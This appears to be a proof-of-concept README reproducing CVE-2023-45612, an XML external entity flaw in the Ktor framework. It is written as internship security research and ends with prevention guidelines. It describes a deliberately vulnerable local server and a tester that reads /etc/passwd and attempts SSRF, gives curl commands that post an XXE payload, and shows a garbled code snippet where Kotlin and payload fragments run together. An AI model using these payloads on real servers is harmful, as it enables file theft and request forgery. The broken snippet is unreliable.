## https://sploitus.com/exploit?id=A8E38229-B1CC-58E7-A30C-9A52197F519E
# Ktor XML XXE Vulnerability Reproduction (CVE-2023-45612)
**Research by:** Luka Andghuladze
**For:** JetBrains Ktor Security Research Internship 2025-2026
XML External Entity (XXE) vulnerability in Ktor framework versions before 2.3.5. The vulnerability exists in the ContentNegotiation plugin when configured with XML serialization using default settings.
---
## Prerequisites
- Java 11 or higher
- Gradle 8.0+
- Python 3.7+
Verify installations:
```bash
java -version
gradle --version
python3 --version
```
---
## Setup and Installation
Navigate to project directory:
```bash
cd jetbrains-ktor-xxe-poc
```
Install Python dependencies:
```bash
pip3 install -r requirements.txt
```
Build the project:
```bash
gradle build
```
---
## Running the Demonstration
**Terminal 1 - Start the vulnerable server:**
```bash
gradle run
```
Wait for: `Responding at http://0.0.0.0:8080`
**Terminal 2 - Run the exploit tests:**
```bash
python3 exploit_tester.py
```
The script tests four scenarios:
1. Normal XML request (baseline)
2. XXE attack reading /etc/hostname
3. XXE attack reading /etc/passwd
4. SSRF attack via XXE
---
## Project Structure
```
jetbrains-ktor-xxe-poc/
โโโ build.gradle.kts
โโโ settings.gradle.kts
โโโ README.md
โโโ requirements.txt
โโโ exploit_tester.py
โโโ src/main/kotlin/com/jetbrains/ktor/security/
โ โโโ ServerApplication.kt
โ โโโ RequestModel.kt
โโโ src/main/resources/
โ โโโ logback.xml
โโโ payloads/
โโโ legitimate_request.xml
โโโ xxe_attack_passwd.xml
```
---
## Technical Details
### Vulnerability Overview
CVE-2023-45612 affects Ktor versions before 2.3.5. The default XML parser configuration in the ContentNegotiation plugin allows:
- DTD processing
- External entity resolution
- Unrestricted entity expansion
This enables attackers to:
- Read arbitrary files from the server
- Perform Server-Side Request Forgery (SSRF)
- Execute Denial of Service attacks
- Potentially achieve remote code execution in specific configurations
### Vulnerable Code
The server uses the default XML configuration:
```kotlin
install(ContentNegotiation) {
xml() // Insecure in Ktor
]>
Attacker
&xxe;
```
---
## Expected Results
### On Vulnerable Server (Ktor 2.3.4)
```
[!!!] SERVER IS VULNERABLE TO:
- File disclosure (/etc/hostname)
- Critical file access (/etc/passwd)
- SSRF via XXE
[!] CVE-2023-45612 confirmed
```
---
## Proof of Concept Screenshots
Visual evidence of successful exploitation:
**Server Running:**

**Exploit Test Results (Part 1):**

**Exploit Test Results (Part 2):**

---
## Implementation Notes
**ServerApplication.kt** - Implements a Ktor server with:
- ContentNegotiation plugin configured for XML
- POST /api/process endpoint that accepts XML data
- Response reflection making XXE exploitation visible
**exploit_tester.py** - Automated testing script that:
- Verifies server connectivity
- Tests baseline functionality
- Attempts multiple XXE attack vectors
- Generates vulnerability report
**RequestModel.kt** - Data class for XML deserialization with kotlinx.serialization
---
## Manual Testing
You can also test manually with curl:
```bash
# Normal request
curl -X POST http://localhost:8080/api/process \
-H "Content-Type: application/xml" \
-d @payloads/legitimate_request.xml
# XXE attack
curl -X POST http://localhost:8080/api/process \
-H "Content-Type: application/xml" \
-d @payloads/xxe_attack_passwd.xml
```
---
## Prevention Guidelines
To prevent XXE vulnerabilities in Ktor applications:
1. Update to Ktor 2.3.5 or later
2. Configure XML parsers to disable external entities
3. Validate and sanitize all XML input
4. Use JSON instead of XML when possible
5. Implement proper input validation
6. Apply security headers and rate limiting
7. Regular security testing and code reviews
---
## Author
Luka Andghuladze
Research conducted as part of the application for JetBrains Ktor Security Research Internship (2025-2026).
```